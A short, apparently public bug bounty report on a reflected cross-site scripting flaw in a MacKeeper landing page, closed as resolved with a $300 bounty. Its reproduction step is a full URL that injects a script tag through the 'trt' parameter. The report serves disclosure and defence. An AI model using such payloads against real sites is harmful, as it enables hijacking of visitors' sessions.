RXSS on /landings/123.1/index.php (mackeeperapp.mackeeper.com)
Medium
C
Clario
Submitted None
Team Summary
Official summary from Clario
### Summary Hi! I found Reflected Cross-Site Scripting attack on mackeeperapp.mackeeper.com via `/landings/123.1/index.php` endpoint. ### Step to reproduce `https://mackeeperapp.mackeeper.com/landings/123.1/index.php?affid=zzb_175.331184.1530814850.33.zzb&trt=29_5tse3g%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Exljdm&utm_source=N%2FA&utm_medium=zzb_3265&utm_campaign=78&utm_term=&utm_content=78&userDefiner=zzb_3265&epayId=29&landId=284&installer=78&guid=3e60b030-edc3-11e7-99a5-02e10695cdfa&reqid=ca9f9bf4367bb2a00e1cd3af1bd1521a`
Actions:
Reported by
sec0ndw0lf
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$300.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected